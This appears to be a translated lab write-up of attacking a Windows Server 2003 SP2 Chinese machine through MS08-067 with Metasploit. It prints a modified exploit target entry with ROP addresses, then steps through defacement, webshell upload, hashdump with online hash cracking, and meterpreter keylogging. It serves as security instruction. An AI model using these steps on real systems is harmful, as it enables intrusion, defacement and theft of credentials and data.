I. Test environment
Attacker: Kali (Nmap + MSF)
Target: Windows Server 2003 SP2 Chinese version
Vulnerability exploited: MS08-067
II. Vulnerability description
MS08-067 is the vulnerability whose full name is the Windows Server service RPC request buffer overflow vulnerability. If an affected system receives a specially crafted RPC request, it allows remote code execution and could be used for worm attacks. The affected systems are Microsoft Windows 2000, Windows XP, and Windows Server 2003.
III. Penetrating the target
1. Information gathering with Nmap: the target has port 445 open, so it may be vulnerable to MS08-067.
I tried the MSF exploit module ms08_067_netapi.rb, and the attack failed several times. From the information returned, the target is the Chinese version of Windows Server 2003, so I switched to the following directory: /usr/share/metasploit-framework/modules/exploits/windows/smb
I found the ms08_067_netapi.rb file and read it carefully again: there is no target entry for the Chinese version.
So I searched Baidu and finally borrowed from an expert's article, modifying the exploit module slightly.
Make a backup of the original file:
Add the following code to ms08_067_netapi_ser2003_zh.rb; in fact only the four jump pointer addresses are changed (the same approach extends to other systems ...). The block is one entry in the module's Targets array:
# Added target entry for the Chinese Windows Server 2003 SP2 build
['Windows 2003 SP2 Chinese (NX)',
  {
    'Retdec'    => 0x7c99beb8, # dec esi, ret @ntdll.dll (bytes 0x4ec3)
    'Retpop'    => 0x7cb5e84e, # push esi, pop ebp, ret @shell32.dll (bytes 0x565dc3)
    'Jmpesp'    => 0x7c99a01b, # jmp esp @ntdll.dll (bytes 0xffe4)
    'DisableNX' => 0x7c96f517, # NX disable @ntdll.dll
    'Scratch'   => 0x00020408,
  }
],
Find the module with the search command and select it with use.
Enter info to view the module details; the newly added target appears as the first row.
Enter show options, then set the target IP and the payload.
Enter exploit to attack; the target language is not recognised.
Then set the target manually.
Okay, a new problem: the message says the previous attack crashed the target system.
Restart the target host, repeat the same steps, and the attack succeeds.
System privileges obtained.
Try echoing a simple file onto the site to place a defacement page.
It worked.
Find the website's database; here I offer two ideas for dumping it.
Go back to the meterpreter interface.
1. Change to the website's directory, echo or upload a webshell file directly, then connect through the browser to dump the database.
2. Enter hashdump to obtain the password hashes of all users on the target host, recover the plaintext, then log in remotely and dump the database directly.
3. Note: if the target host does not have port 3389 open, refer to: https://www.cnblogs.com/panisme/p/8341970.html
Copy this hash value, 32ed87bdb5fdc5e9cba88547376818d4, to https://www.somd5.com/ for lookup,
and obtain the administrator password in plaintext, as shown:
Of course, Meterpreter can do far more than this: keylogging, screenshots, and so on ...
Here is the keylogger test:
First run ps to view the processes running on the target host.
Then use migrate + PID to bind to the corresponding process.
Use keyscan_start to start keyboard monitoring, keyscan_dump to print the captured content, and finally keyscan_stop to end keyboard monitoring.
IV. Reference: https://bbs.pediy.com/thread-186737.htm
Using the MSF ms08_067 module to attack a Windows Server 2003 SP2 Chinese system